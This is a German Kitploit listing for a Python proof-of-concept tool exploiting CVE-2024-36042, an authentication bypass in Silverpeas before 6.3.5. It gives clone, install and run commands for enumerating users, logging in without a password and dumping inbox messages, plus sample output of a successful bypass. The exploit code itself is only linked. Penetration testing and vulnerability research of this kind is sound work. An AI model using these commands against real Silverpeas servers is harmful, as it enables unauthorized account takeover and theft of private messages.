Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Silverpeas-AuthBypass-CVE-2024-36042 — Python PoC für CVE-2024-36042 Authentifizierungsumgehung in Silverpeas < 6.3.5. Bietet Versionserkennung, Multi-Thread-Benutzeraufzählung, Nachrichtenextraktion und strukturierte Berichterstattung für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/ha5ant/silverpeas-authbypass-cve-2024-36042
Authentifizierung & AutorisierungAufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsRed Teaming

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
ha5ant/silverpeas-authbypass-cve-2024-36042

Silverpeas-AuthBypass-CVE-2024-36042

Python PoC für CVE-2024-36042 Authentifizierungsumgehung in Silverpeas < 6.3.5. Bietet Versionserkennung, Multi-Thread-Benutzeraufzählung, Nachrichtenextraktion und strukturierte Berichterstattung für autorisierte Sicherheitstests.

Repository anzeigen
4vor 3 MonatenNoch nicht geprüft

Silverpeas-AuthBypass-CVE-2024-36042

Ein sauberer, professioneller Python3-Proof-of-Concept für CVE-2024-36042 – eine Authentifizierungsumgehung in Silverpeas < 6.3.5, die durch fehlende Passwortvalidierung in AuthenticationServlet verursacht wird.

Python 3.8+ License: MIT


Übersicht

Silverpeas AuthenticationServlet akzeptiert eine Anmeldeanfrage selbst dann, wenn der Parameter Password im POST-Body fehlt, und gewährt so authentifizierten Sitzungszugriff auf jeden bekannten Benutzernamen. Dieses Tool demonstriert die Schwachstelle verantwortungsbewusst mittels eines modularen, threadbasierten Exploit-Frameworks mit erweiterter Aufklärung, Datenextraktion und professioneller Berichtserstellung.

Betroffen: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m


Funktionen


Installation

root@kitploit:~
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4

Verwendung

Schnelltest (integrierte Benutzerliste)

root@kitploit:~
python3 CVE-2024-36042.py -t http://ZIEL:8080 --dump-messages

Fortgeschrittene Berichterstellung (Markdown + Konsole)

root@kitploit:~
python3 CVE-2024-36042.py -t http://ZIEL:8080 -u admin --dump-messages --message-output both

Forensischer Export (Einzeldateien pro Nachricht)

root@kitploit:~
python3 CVE-2024-36042.py -t http://ZIEL:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./beute

Nur Versionsprüfung (keine Ausnutzung)

root@kitploit:~
python3 CVE-2024-36042.py -t http://ZIEL:8080 --check-version --no-exploit

Über einen Proxy mit rohem HTML-Logging

root@kitploit:~
python3 CVE-2024-36042.py -t http://ZIEL:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html

Ausgabeverwaltung

Das Tool unterstützt vier primäre Ausgabemodi für gedumpte Nachrichten via --message-output:

  1. console (Standard): Gibt bereinigte Nachrichten direkt im Terminal mit Hervorhebung von Schlüsselwörtern aus.
  2. markdown: Erzeugt einen einzelnen {benutzername}_messages.md-Bericht pro Konto im Ausgabeverzeichnis.
  3. files: Erstellt einen Ordner pro Konto und speichert jede Nachricht als einzelne Datei (z. B. message_0006.md) mit nullgepolsterten IDs für eine saubere Sortierung im Dateisystem.
  4. both: Kombiniert die Modi console und markdown.

Artefaktstruktur

root@kitploit:~
ausgabe/
├── SilverAdmin/
│   ├── message_0001.md
│   ├── message_0002.md
│   ├── raw/ (optional: --save-raw-html)
│   │   └── msg_1.html
│   └── session_cookies.txt
├── scr1ptkiddy/
│   ├── messages.md
│   └── session_cookies.txt
└── summary.json

CLI-Referenz

root@kitploit:~
-t, --target        Basis-URL von Silverpeas (erforderlich)
-u, --user          Einzelner Benutzername als Ziel
--userlist          Datei mit einem Benutzernamen pro Zeile
--dump-messages     Nachrichten im Posteingang scrapen und anzeigen
--max-id            Maximale Nachrichten-ID zum Prüfen (Standard: 50)
--threads           Gleichzeitige Worker (Standard: 5)
--proxy             HTTP-Proxy-URL
--message-output    Ausgabemodus: {console, markdown, files, both}
--output-format     Dateiformat: {md, txt}
--json              Vollständigen JSON-Bericht exportieren
--csv               CSV der gescrapten Nachrichten exportieren
--outdir            Ausgabeverzeichnis für Exporte
--no-color          ANSI-Farbausgabe deaktivieren (nützlich für Logs)
--save-raw-html     Ursprüngliche HTML-Antworten zum Debuggen speichern
--check-version     Nur Version ermitteln (Fingerabdruck)
--no-exploit        Ausnutzung überspringen (mit --check-version kombinieren)
--quiet, -q         Minimale Ausgabe
--no-banner         Banner unterdrücken

Ausgabebeispiel

root@kitploit:~
[*] Ziel     : http://10.49.169.44:8080
[*] Version  : 6.3.1
[+] Version 6.3.1 < 6.3.5 - anfällig.

[*] Versuche: scr1ptkiddy
[+] UMGEHEN -> scr1ptkiddy
[+] Daten gespeichert unter ./scr1ptkiddy

────────────────────────────────────────────────────────────────────
  Ausführungszusammenfassung
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Konto        │ Status   │ Nachrichten │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy   │ ERFOLG   │ 6        │
│ admin         │ FEHLGESCHLAGEN │ 0        │
└───────────────┴──────────┴──────────┘

[+] JSON-Bericht -> ./report_20260516_013210.json

Warum es das gibt

Dieses Repository ist Teil meines Offensive-Security-Portfolios. Es demonstriert:

  • Übersetzung von Schwachstellenforschung – Umwandlung einer veröffentlichten CVE in einen funktionierenden, zuverlässigen Exploit.
  • Hochwertige Werkzeuge – Robuste Fehlerbehandlung, mehrsprachige Unterstützung und strukturierte Ausgabeverwaltung.
  • Operatives Bewusstsein – Multithreading, Proxy-Unterstützung und Deduplizierungslogik für realistische Umgebungen.
  • Professionelles Engineering – Saubere Code-Architektur, umfassende Dokumentation und Fokus auf Bedienererfahrung (UX).

Haftungsausschluss

Dieses Tool wird ausschließlich für autorisierte Sicherheitstests, Forschung und Bildungszwecke bereitgestellt. Unautorisierter Zugriff auf Computersysteme ist illegal. Holen Sie stets die ausdrückliche Erlaubnis ein, bevor Sie eine Infrastruktur testen, die Ihnen nicht gehört.


Lizenz

MIT

Tool herunterladen
FunktionBeschreibung
VersionserkennungFingerabdruck der Silverpeas-Version und des Schwachstellenstatus vor der Ausnutzung.
MultithreadedGleichzeitige Benutzerenumeration via ThreadPoolExecutor mit threadsicherer Ausgabe.
Erweiterte ErkennungMehrsprachige (Englisch/Französisch) Endpunkt-Erkennung mit Multi-ID-Sondierung.
DatenextraktionHochgenaues Nachrichten-Dumping mit Deduplizierung und Filterung von Standardtexten.
Flexible AusgabeUnterstützung für Konsole, Markdown-Berichte und einzelne Dateiexporte (.md oder .txt).
Proxy & DebuggingRouten durch Burp/ZAP (--proxy) und Speichern von rohem HTML zum Parser-Debugging.
Saubere UXASCII-Zusammenfassungstabellen, Hervorhebung von Schlüsselwörtern und optionale ANSI-Farbsteuerung.